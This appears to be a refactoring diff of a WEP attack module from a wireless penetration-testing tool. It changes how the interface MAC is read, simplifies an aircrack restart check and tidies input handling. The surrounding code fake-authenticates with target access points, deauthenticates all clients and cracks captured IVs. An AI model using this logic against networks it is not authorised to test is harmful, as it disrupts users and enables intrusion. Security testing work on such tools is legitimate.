@@ -5,7 +5,7 @@ from ..model.attack import Attack
 from ..tools.airodump import Airodump
 from ..tools.aireplay import Aireplay, WEPAttackType
 from ..tools.aircrack import Aircrack
-from ..tools.ifconfig import Ifconfig
+from ..tools.ip import Ip
 from ..config import Configuration
 from ..util.color import Color
 from ..util.input import raw_input
@@ -67,7 +67,7 @@ class AttackWEP(Attack):
                     if self.fake_auth():
                         # We successfully authenticated!
                         # Use our interface's MAC address for the attacks.
-                        client_mac = Ifconfig.get_mac(Configuration.interface)
+                        client_mac = Ip.get_mac(Configuration.interface)
                         # Keep us authenticated
                         fakeauth_proc = Aireplay(self.target, 'fakeauth')
                     elif len(airodump_target.clients) == 0:
@@ -154,8 +154,7 @@ class AttackWEP(Attack):
                                         ivs_files = ivs_files[-1]  # Use most-recent .ivs file
                                     aircrack = Aircrack(ivs_files)
 
-                            elif Configuration.wep_restart_aircrack > 0 and \
-                                    aircrack.pid.running_time() > Configuration.wep_restart_aircrack:
+                            elif 0 < Configuration.wep_restart_aircrack < aircrack.pid.running_time():
                                 # Restart aircrack after X seconds
                                 #Color.pl('\n{+} {C}aircrack{W} ran for more than {C}%d{W} seconds, restarting' % Configuration.wep_restart_aircrack)
                                 aircrack.stop()
@@ -166,7 +165,6 @@ class AttackWEP(Attack):
                                         ivs_files = ivs_files[-1]  # Use most-recent .ivs file
                                     aircrack = Aircrack(ivs_files)
 
-
                         if not aireplay.is_running():
                             # Some Aireplay attacks loop infinitely
                             if attack_name == 'chopchop' or attack_name == 'fragment':
@@ -288,7 +286,8 @@ class AttackWEP(Attack):
         attack_index += 1
         Color.pl('     {G}%d{W}: {R}Stop attacking, {O}Move onto next target{W}' % attack_index)
         while True:
-            answer = raw_input(Color.s('{?} Select an option ({G}1-%d{W}): ' % attack_index))
+            Color.p('{?} Select an option ({G}1-%d{W}): ' % attack_index)
+            answer = raw_input()
             if not answer.isdigit() or int(answer) < 1 or int(answer) > attack_index:
                 Color.pl('{!} {R}Invalid input: {O}Must enter a number between {G}1-%d{W}' % attack_index)
                 continue
@@ -303,7 +302,7 @@ class AttackWEP(Attack):
             Color.p('\r{+} {O}Deauthenticating *broadcast*{W} (all clients)...')
             Aireplay.deauth(target.bssid, essid=target.essid)
 
-            attacking_mac = Ifconfig.get_mac(Configuration.interface)
+            attacking_mac = Ip.get_mac(Configuration.interface)
             for client in target.clients:
                 if attacking_mac.lower() == client.station.lower():
                     continue  # Don't deauth ourselves.
@@ -327,7 +326,6 @@ class AttackWEP(Attack):
             attacks_remaining.insert(0, attacks_remaining.pop(answer-2))
             return False # Don't stop
 
-
     def fake_auth(self):
         '''
         Attempts to fake-authenticate with target.
@@ -353,7 +351,6 @@ class AttackWEP(Attack):
                     ' {G}--require-fakeauth{W} was not set')
         return fakeauth
 
-
 if __name__ == '__main__':
     Configuration.initialize(True)
     from ..model.target import Target
@@ -362,4 +359,3 @@ if __name__ == '__main__':
     wep = AttackWEP(target)
     wep.run()
     Configuration.exit_gracefully(0)
-
